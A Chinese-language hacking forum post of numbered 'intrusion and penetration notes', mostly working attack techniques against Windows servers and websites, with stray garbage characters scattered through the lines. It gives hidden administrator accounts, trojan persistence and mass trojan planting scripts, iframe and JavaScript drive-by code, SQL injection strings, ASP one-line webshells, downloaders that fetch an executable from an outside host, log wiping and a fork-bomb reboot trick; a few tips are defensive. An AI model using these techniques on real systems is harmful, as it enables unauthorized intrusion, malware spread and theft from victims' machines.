中国网络渗透测试联盟

标题: 入侵渗透笔记 [打印本页]

作者: admin    时间: 2012-9-15 14:13
标题: 入侵渗透笔记
Xp系统修改权限防止病毒或木马等破坏系统,cmd下,8 c$ }& Y7 |. i8 Q1 Z" G, M# D
cacls C:\windows\system32 /G hqw20:R
" @1 z$ Y. v7 I2 J思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
; Q) i0 x' d+ k6 f. z0 P, A恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
3 h9 H: T+ u/ i& G/ m
7 V5 g+ ?# _( T0 I0 b2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。6 h' W4 \$ g1 q$ e1 ^

2 g* f$ c- }7 @2 J% i3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。, [9 V$ n+ u' C0 F, \
# ^  A& n4 E+ O  \6 c
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
0 d% _# C# a7 `+ r1 v1 S. P% \
: {. m+ o' a' X/ x9 M5、利用INF文件来修改注册表
0 _& h# \' ~. k, }# d$ f[Version]
2 G& S8 h# s2 v  R5 E; u/ SSignature="$CHICAGO$"9 c9 L- c) I) O) G# O) C
[Defaultinstall]( J: r6 _& A% |# G# L9 W# p
addREG=Ating/ @7 T4 E, S7 ]& h
[Ating]
1 R& i5 }7 o% ]& ]1 }HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
$ P$ Y" q$ j' s- Z" n3 `& R以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
) n0 x$ V% J' y3 ]' h# @  b5 E- Mrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径; V- J, w* \1 @+ _
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
4 [  K, k! C; oHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
7 q' u$ R* c7 ~1 K4 c7 SHKEY_CURRENT_CONFIG 简写为 HKCC4 S# l6 I5 t! f/ j  N
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值7 q# \& ]' g+ Q/ L" V2 J% p) A
"1"这里代表是写入或删除注册表键值中的具体数据
, [5 g: d8 p* _+ E0 W8 G- E/ m- S: i8 K4 k  Y
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,, D  E' U) f( x' B+ ^9 `( N5 a
多了一步就是在防火墙里添加个端口,然后导出其键值
/ p0 C' T5 W: {+ U+ B[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
+ A6 V) {1 M* |
3 [6 q- ^9 L3 _; f7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽  _) n; O- @2 A$ R. K
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
6 K3 X, Y4 M( u, z/ p# I) h8 u4 R+ n1 T9 q" c
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。" l  t9 b  G  S) J
% f! T/ M! ?6 `: b$ T
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,! ~3 A7 R4 I- U. W  _; o8 _
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
1 y8 k9 v/ W1 i; K1 N& g5 Y3 F" d2 W' a' f  k; e* O
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”1 @# c: X3 Z4 z6 t; i. g
% f5 N1 q6 f5 X  M, @
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,% ~. O2 A1 }3 m
用法:xsniff –pass –hide –log pass.txt
7 A9 ^. I6 L8 N: y+ k  V
$ {" L* e6 k2 T* W- x1 o12、google搜索的艺术
8 a2 M  N4 p% C0 E- w  Z搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
- l% e; e. I0 C4 `8 [6 l/ d9 w或“字符串的语法错误”可以找到很多sql注入漏洞。5 C6 |; x& j+ P8 D  |% K; D+ w3 Q
  _( D& Z. P1 a( E* k
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
6 R: T! \" U& ~& g" n8 b6 m  e# B' z  Q0 z
14、cmd中输入 nc –vv –l –p 1987
, B3 L8 K4 t8 m做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
. W0 b5 H/ h9 L5 r  N" a; `5 [+ A3 V6 h7 Q
15、制作T++木马,先写个ating.hta文件,内容为
/ c) n8 `. ?! W9 i. G<script language="VBScript">
# p: q& g9 Y; |9 Y0 xset wshshell=createobject ("wscript.shell" )5 H0 a% H) b$ G
a=wshshell.run("你马的名称",1)
* a. u" s) l7 z2 e, l2 dwindow.close
; x2 ?% d# g9 k$ {( b2 D* X</script>
; y. R% v7 A0 e再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。/ R0 i0 H" ~! ^5 Q. J3 I+ G+ C. M
$ @# H8 x8 ?1 L
16、搜索栏里输入" b5 Q8 o7 t% C4 E& d1 @4 o% p
关键字%'and 1=1 and '%'='5 a5 L! L! \% G
关键字%'and 1=2 and '%'=') c  }& J. S7 w0 R( Z
比较不同处 可以作为注入的特征字符
6 H# D0 _, `# }& b5 v/ z
3 n! j/ R- |" I; \6 U& l3 C! R17、挂马代码<html>! y. X4 z" L  t) a8 {
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>7 b$ @- n- a$ S/ g! s
</html>- V; w4 j0 j0 Z8 T% H$ `; h- V
/ f& T0 F) L1 t" B$ ~+ c! |
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,+ v8 n% t  v4 J5 h9 P
net localgroup administrators还是可以看出Guest是管理员来。: N- M/ P- N  v, W$ E5 J" t4 ^3 j, x

% [9 z/ ^0 C) P$ s19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等) n& u2 q; e, F* [( s
用法: 安装: instsrv.exe 服务名称 路径
' A: o3 O2 `! x; k. G( Q( j卸载: instsrv.exe 服务名称 REMOVE
; u& T/ ?2 z4 H  i
: D, b+ y3 J3 Q5 N4 k3 Z: a2 U
4 _8 ]6 v$ Y1 A2 K7 K3 \21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
/ j0 @, D2 @. C不能注入时要第一时间想到%5c暴库。
# K+ J3 i& r. B& s# V- g" N0 H* r7 @4 T
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
1 W; }4 T9 K! _8 r4 z; a7 \. E+ }8 [  T5 c7 r( f5 G1 O6 p' Z
23、缺少xp_cmdshell时. u4 N! a1 e* o4 {. x8 R( [
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'8 ?9 z$ |+ x: \1 z
假如恢复不成功,可以尝试直接加用户(针对开3389的)' u- k) [8 Q# p1 j) ?" w8 i
declare @o int8 g  ]% g$ i; d0 J9 F
exec sp_oacreate 'wscript.shell',@o out
3 |5 o- A3 e$ i. r7 N8 Qexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
8 U5 T2 D/ ~: f" y! z* T
* R# D$ W6 h' R24.批量种植木马.bat  j% g' Q* n3 F9 Q6 L- G- X" |
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中2 X" K' w( L9 g8 D" h# D" ?, E# G; }, O
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间" Z- \5 W* e/ M8 [9 {+ ?3 }
扫描地址.txt里每个主机名一行 用\\开头
; X+ d& o4 v5 M; s5 s: z5 ]% f9 i: v
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。6 Y' n8 e; K3 J

4 X6 h( f9 t' K; R8 A26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.9 R0 Y* S# w' I% E7 S( v4 a
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.1 R# E3 u2 e: d% l* k; z- V& l
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
' P5 j, {1 X0 X) a: L0 s) P- f0 h9 _! \, Y7 `
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP( K- `% O( T+ h/ V$ t1 @0 c% ?6 s
然后用#clear logg和#clear line vty *删除日志  R/ ]% j4 _5 M7 X" m

4 p+ B, l2 w; {$ }) ?5 Q' C1 d/ O28、电脑坏了省去重新安装系统的方法& I" k. j9 ?7 q+ k" K) H3 J
纯dos下执行,/ r' V9 i: ]+ B3 _, \1 L/ y- N
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config; k6 k# r( d4 }2 \6 ^; S
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
* {) ~$ \$ y% V- T! [4 c7 l  ?" E5 \' d; o+ Q
29、解决TCP/IP筛选 在注册表里有三处,分别是:5 z. Q3 S8 d& P+ g2 a+ U
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip9 R" l0 B/ U4 h$ ]
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip+ Q1 c$ z& |1 @! \! ~
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip. }" G: n# y" `* J
分别用
9 _) G+ i/ V* v% Gregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip8 Z7 L& l- G  ~+ X9 ^
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
# }& W& S; l0 K$ Tregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
, u0 c- T" C1 N- J# w命令来导出注册表项/ |3 E' ]! Q, ^  s
然后把三个文件里的EnableSecurityFilters"=dword:00000001,& w  u, P; I" F- B0 y. v
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
. t" {# B5 I) ]regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
. Q$ S0 B. i& w/ T  g2 o. r
7 z  b+ V, p! q- H30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U7 a+ o& K* F" ?0 S* @' d
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3/ G" H- n$ _1 T$ Q
1 X; v/ ^. v) l' n
31、全手工打造开3389工具/ h' O% L; v0 R2 `
打开记事本,编辑内容如下:. h8 R. l4 m# {( l/ r2 O" L5 e
echo [Components] > c:\sql
7 P( T/ H4 r! m, Z& Xecho TSEnable = on >> c:\sql7 z9 w- S. L; ~
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
% k% Y( r' W% |) H1 F/ |  |% I编辑好后存为BAT文件,上传至肉鸡,执行
; e8 x; l8 b9 G( }% S/ j- V' B  w* B+ g6 E, y( g% z5 Y# a7 ^4 d
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马6 u5 y9 u& d) _, ^! O
' M  L/ L* {2 h; ]
33、让服务器重启# q  b- y" D% J3 l0 N" k1 n
写个bat死循环:
; K+ E. m( @- ^# t$ y@echo off' L' b& u0 U* b; B2 ]4 c
:loop1
9 U9 R7 F& w" Q! Gcls
3 v% c/ ]* z# x4 b4 U% u$ {start cmd.exe
* ]8 N/ E8 X5 [$ Y6 ], ^! Vgoto loop1: @- ?+ m" I& d% h; |, u
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
$ T5 b+ r, Q! Q& d! V4 ]4 i& Y, L9 K. X
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
7 Z. o- W( G5 Z% ~5 d" j+ s+ n$ i* ]@echo off1 ?  v+ j/ b+ m
date /t >c:/3389.txt1 l0 d: ^0 z- h9 S& D: N" X( F
time /t >>c:/3389.txt% j. O) I# C5 [- w
attrib +s +h c:/3389.bat" S) E9 s1 A! }  U. t) ^$ a3 H! Y% T
attrib +s +h c:/3389.txt/ K+ U9 Y( k0 L
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt4 q3 p! |+ b- v4 G( y6 U8 [
并保存为3389.bat8 s5 K1 `% B$ L) f' J  o/ \: h
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号. O4 c# a8 M: Q5 J7 H8 B9 _
/ B" _/ ^5 r$ M+ s( U
35、有时候提不了权限的话,试试这个命令,在命令行里输入:, o8 ^4 R2 h8 m* n1 n4 K
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
% O7 z6 \; y. i& `4 J1 N3 g+ C; z输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。3 V7 {( g% n9 m
6 Q7 D8 |3 D" }$ |
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
  \0 b, B1 B9 z! decho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
( D4 ?7 P2 _3 D6 `" x# m9 Yecho 你的FTP账号 >>c:\1.bat //输入账号
( K1 l! j3 F" I; }echo 你的FTP密码 >>c:\1.bat //输入密码; Y8 S% N3 [8 u7 V8 j1 K
echo bin >>c:\1.bat //登入+ [  D: f) r- E$ T' ]
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么. X+ O! [" @/ i
echo bye >>c:\1.bat //退出% |8 D# m4 ?7 M4 E
然后执行ftp -s:c:\1.bat即可
, y+ K% H* M9 O2 E9 x' p' h1 _& ~
37、修改注册表开3389两法, O) P/ J) a% v1 y7 b; [
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
! s( |; C  y1 {, N: C6 C1 yecho Windows Registry Editor Version 5.00 >>3389.reg
8 J4 U& l4 l0 Q7 ^echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
. ?) w# Z0 o5 z$ G. O# qecho "Enabled"="0" >>3389.reg1 f. }+ _5 b4 _
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
2 @  _8 [9 _" @5 x3 d/ uNT\CurrentVersion\Winlogon] >>3389.reg
1 I" ]9 o1 M, A" Jecho "ShutdownWithoutLogon"="0" >>3389.reg( Y, p+ L) S3 W# j; P
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
% O! _3 [# P" P1 M4 B" y. e, g>>3389.reg
' t  E  r8 W/ Y5 B' yecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
4 I9 l" }/ L, S, }echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
3 n- J' n8 t6 D7 f8 y  A) ]>>3389.reg  I- o$ n9 e& w# {& G* K
echo "TSEnabled"=dword:00000001 >>3389.reg
5 X4 q5 N2 A& Xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
, ~8 W/ p- _* X) Z. Qecho "Start"=dword:00000002 >>3389.reg& A* |( g! X* [: l7 t
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]& ?0 g1 `6 B' r0 f
>>3389.reg- [( J3 W$ d% K* T, \3 i, W( R
echo "Start"=dword:00000002 >>3389.reg
# Z* @6 h" [, E+ y- B: o* z+ w2 @echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
. c% h7 C, v  m! A% t# Jecho "Hotkey"="1" >>3389.reg
" Y# B1 T; [3 O2 x9 E- y3 p; Q$ R$ U" Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 y8 I: F4 E3 y: FServer\Wds\rdpwd\Tds\tcp] >>3389.reg
& _( R3 ~( k, d: q& C1 e, G. techo "PortNumber"=dword:00000D3D >>3389.reg+ T( x) j) T& T1 w% K% P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal- u9 {/ Y) g5 P$ X# K
Server\WinStations\RDP-Tcp] >>3389.reg3 R4 }5 C  h$ E7 r' @
echo "PortNumber"=dword:00000D3D >>3389.reg  d9 X% {/ r# C7 b) F8 {1 M/ _
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。% o& l1 u6 ~1 z# O# W7 [+ _
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
5 {" G. t  S. j/ C4 \! d因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
" |; [% ?7 n  E+ d2 S1 A(2)winxp和win2003终端开启
0 t; C$ ^& E# k用以下ECHO代码写一个REG文件:
' A/ a6 e9 s! G7 J3 b% Secho Windows Registry Editor Version 5.00>>3389.reg* i3 b1 D( K( F% k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
! M! v, N7 b& N6 U2 rServer]>>3389.reg
( p' E& T- _9 @. Jecho "fDenyTSConnections"=dword:00000000>>3389.reg' W/ c4 t$ S! s, q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal3 m0 k8 e8 @" B' Z0 q$ ^1 |" n+ L" ^0 X
Server\Wds\rdpwd\Tds\tcp]>>3389.reg# X: C) K( @0 c2 h# `& @* I
echo "PortNumber"=dword:00000d3d>>3389.reg, P+ O5 _. y9 @1 J" q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 ?- O& e: c+ w- K* I5 [Server\WinStations\RDP-Tcp]>>3389.reg
7 x2 I# I8 a; `; u, ?echo "PortNumber"=dword:00000d3d>>3389.reg
6 I3 {; t4 Q& L) }2 K/ k然后regedit /s 3389.reg del 3389.reg
; m# K4 T+ R4 t4 LXP下不论开终端还是改终端端口都不需重启9 Y" ~3 N  p) e. h. S
, t6 v* m7 ]3 w- W
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
2 t& v# c8 D% ~1 V7 [用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'8 l! h  O, E3 M6 j

: }, O  Y/ [7 ^* k- x, ~' C39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!- y/ u0 ^. b8 N3 C& d
(1)数据库文件名应复杂并要有特殊字符
+ ]& Z7 t3 V) h(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
/ b0 t& m. E& B9 w将conn.asp文档中的
- m; f& E' k# \/ B2 K5 U5 ADBPath = Server.MapPath("数据库.mdb"). V4 k; V$ C; z; m0 \% }7 n' G
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
( L& _* O" I0 k' U# j2 @6 F6 H+ Q
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置" M# ]* H2 D! l, S8 E# T
(3)不放在WEB目录里9 I( @3 l8 }9 C2 f2 i
& j- T8 `5 p- \. j4 L& o% G
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
0 h# s' q! R1 ^4 c可以写两个bat文件% Z4 {0 u+ s1 R" D
@echo off
+ _' c* M+ x1 n, P; j: }; ~' M. R' j@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
9 |4 G* f# ~' T* U6 Z2 ]@del c:\winnt\system32\query.exe
  M! h3 _' H8 Q! f# F! P$ P@del %SYSTEMROOT%\system32\dllcache\query.exe6 J+ F6 @1 @! I& b$ r
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
5 {6 U+ t4 q% O  v3 |( f, v8 W0 c  |
@echo off: U, K+ e+ N) C6 s- P+ h
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
( g" X( j$ V" l: N: i5 L@del c:\winnt\system32\tsadmin.exe% F* |* {* r& a- Y4 t8 D
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex. \' C9 z/ {! p2 Q1 E' e
; r  n  ]; b* V- M6 q7 B
41、映射对方盘符9 n6 u( _; h% ^- |0 W
telnet到他的机器上,$ ?* @0 A) O; N  `) V; F4 [
net share 查看有没有默认共享 如果没有,那么就接着运行: k% }$ B% \. E+ A2 S# v
net share c$=c:
: f6 H. e2 ]  p( V: {; ]net share现在有c$
' ]/ k$ }# y* d- m; x5 z  H在自己的机器上运行
# z% [0 Y" r1 K4 tnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K  ]9 I/ e0 l4 L. l6 v
$ x, N, j/ C1 e' `" g: _6 V
42、一些很有用的老知识2 ?+ s! q" f' h7 o2 _( R9 T
type c:\boot.ini ( 查看系统版本 )
/ f% q" F' g; P+ X, A! a$ v) [net start (查看已经启动的服务)
1 ?4 Y8 y( s+ j  E5 \query user ( 查看当前终端连接 )
/ E& W5 F7 i# Wnet user ( 查看当前用户 ), Q7 u! |/ h, }, x
net user 用户 密码/add ( 建立账号 )  A5 u) v4 V" M0 H) I6 X
net localgroup administrators 用户 /add (提升某用户为管理员)! o' ^) t! d  B+ H
ipconfig -all ( 查看IP什么的 )$ F+ B  v. @3 w3 n3 U: K
netstat -an ( 查看当前网络状态 )) n/ O" w! Q; a& k3 k  F5 o/ g
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
2 {, {2 I, Z# Z* c7 D) x! O克隆时Administrator对应1F4
. V$ ?7 J3 v! Z% x. c  hguest对应1F5! D, g9 V/ z5 @" m% c1 ?& ?
tsinternetuser对应3E8. s( b7 N7 [" D8 R" S+ v; P5 P
% `2 L/ s% B4 X; ]/ l
43、如果对方没开3389,但是装了Remote Administrator Service: m% k- Q: _& S9 N5 m9 c' F0 m
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接9 v# }" d2 L( }$ o
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息3 Y6 a. ?* \! T" _
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"0 C6 L, f# z* s0 u8 u, b/ G, A

0 v% A5 a( I% x/ E* y6 x  e44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
6 W6 |2 I  @: C4 R0 d. R( \" G- N& f本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
) d- b. E$ c2 u( V
& O) l1 h7 r. V5 k45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入). Y7 @$ F: }! K& I" w6 S# Q
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open# y, }: t/ |* P6 ^( g) D# o0 {2 o
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =" h$ n" ?9 L- }4 g
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =. G1 H9 m; X$ \3 Y% I! X
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs4 `; |4 e6 b/ O# P
(这是完整的一句话,其中没有换行符)& b3 a/ y& [& }. ~6 w! c# b9 C' M
然后下载:0 l+ C, W# M# C8 {
cscript down.vbs http://www.hack520.org/hack.exe hack.exe. \6 w4 U* W" @- \) e
7 S$ F3 C) A! I* ]5 Z4 k' n4 o
46、一句话木马成功依赖于两个条件:
, q, @% k5 B4 S8 ]. N/ v1、服务端没有禁止adodb.Stream或FSO组件
  r! j# E7 |+ \2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。$ S2 k$ S9 p; e) R: x1 l' k' A8 G4 g9 m
* a6 R  W  @$ Q% X  R
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
7 b) `$ w' @( h, A;alter database utsz set RECOVERY FULL--1 K" @+ R7 b: x
;create table cmd (a image)--2 J7 D3 U; Y4 h: d( V6 y
;backup log utsz to disk = 'D:\cmd' with init--0 D; v4 w8 Q/ M8 C! h" F* L
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--% Z/ c5 [9 x6 A4 N$ `  i' u4 J
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--, w4 A7 E+ C3 m( p
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。$ x7 C: h5 y9 Q

) Q! H+ B+ _$ [% t9 I# j48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:/ D) M& R: V% x) B* d% t4 `2 R; ^

2 R: e- p* O5 E3 v' Q) z7 H& ?& v用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options* ]% h* a; |& k3 `! \
所有会话用 'all'。
) T" M. U/ o  G2 B# h# t+ C5 U-s sessionid 列出会话的信息。$ D% m- D6 T1 ]6 B2 E
-k sessionid 终止会话。
! r1 k/ d4 x( l" `# n! i+ t-m sessionid 发送消息到会话。8 Y, J! E- Y/ x5 H+ Y
% R0 F& k/ i1 W* \, b' S
config 配置 telnet 服务器参数。2 c9 N% o! c0 P' o" I

0 S3 i; w7 @: k0 _common_options 为:4 B% k* T2 v1 b; {
-u user 指定要使用其凭据的用户# L% U9 a6 }* D! F' x" H: v% H' H; [
-p password 用户密码+ s% g5 o" c. K4 J
- s; @: R/ O% r, @
config_options 为:" T/ z2 i& D2 u# d7 g! b
dom = domain 设定用户的默认域0 H0 g# V/ }+ D' X, \
ctrlakeymap = yes|no 设定 ALT 键的映射0 l# u/ K. l1 O  {7 b5 @
timeout = hh:mm:ss 设定空闲会话超时值) n7 {. n$ l# w! I2 k
timeoutactive = yes|no 启用空闲会话。( l" v' v" A. K; Q+ [2 m# O, l
maxfail = attempts 设定断开前失败的登录企图数。
( o+ Q( _* V9 m+ |- A* Mmaxconn = connections 设定最大连接数。
, [5 }2 |: a3 p2 H1 L. Q9 mport = number 设定 telnet 端口。
8 i! j5 I) a9 ]! ^sec = [+/-]NTLM [+/-]passwd
  p# a/ d# ?$ ?% y) G设定身份验证机构
2 \% p4 |: h( d: M# c0 d# zfname = file 指定审计文件名。
, F6 d8 g$ K, H$ ^1 T; s% y% lfsize = size 指定审计文件的最大尺寸(MB)。
, X, |) l% Q- O0 `1 |mode = console|stream 指定操作模式。
( D" j" o: ]+ ]& v5 O' Qauditlocation = eventlog|file|both
( `$ D5 J  X) m) k指定记录地点9 p( i" t8 ?& n  V
audit = [+/-]user [+/-]fail [+/-]admin
$ J( q/ I/ _- p" V, z+ O
* q* `) e8 M, \/ F4 d49、例如:在IE上访问:$ t" c  s3 W* l" e% B9 j# K
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/. d( Y% \% d& V; R" T9 W5 S9 `
hack.txt里面的代码是:+ i0 _0 [/ {/ `  e- Z
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">) o5 M! i& b$ n9 Q
把这个hack.txt发到你空间就可以了!: g( B3 \) ^) i6 r1 z7 x" w
这个可以利用来做网马哦!# A) r' y" }+ Y& A

6 B+ S& }3 w6 l50、autorun的病毒可以通过手动限制!
0 k' B" M  m, A7 q9 a1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
9 S( b5 ?6 I1 x& E% A# y5 t2,打开盘符用右键打开!切忌双击盘符~
: ]) _8 R: d8 D  b! i, d2 p* U3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!: Y* l" \. s/ i; l

# s8 O' j6 S2 o9 O5 [7 @# G51、log备份时的一句话木马:' u% I* M( ]" W9 u
a).<%%25Execute(request("go"))%%25>
8 S' E; a& h5 R8 Hb).<%Execute(request("go"))%>
2 o0 d" G7 j, X0 \c).%><%execute request("go")%><%* b3 A& e$ w* ~8 G/ o! Y$ C
d).<script language=VBScript runat=server>execute request("sb")</Script>$ C" A+ a5 E: }. `8 e6 c2 ?
e).<%25Execute(request("l"))%25>
, C0 d8 B6 e1 Q8 Sf).<%if request("cmd")<>"" then execute request("pass")%>' J; m1 I, P. G6 ^9 p$ Z# W# S  Y
* r, i/ Z) K- q: C  ]
52、at "12:17" /interactive cmd
. y0 H! X. }7 d% Q; H- I执行后可以用AT命令查看新加的任务$ n& U! b' B$ `/ @+ \
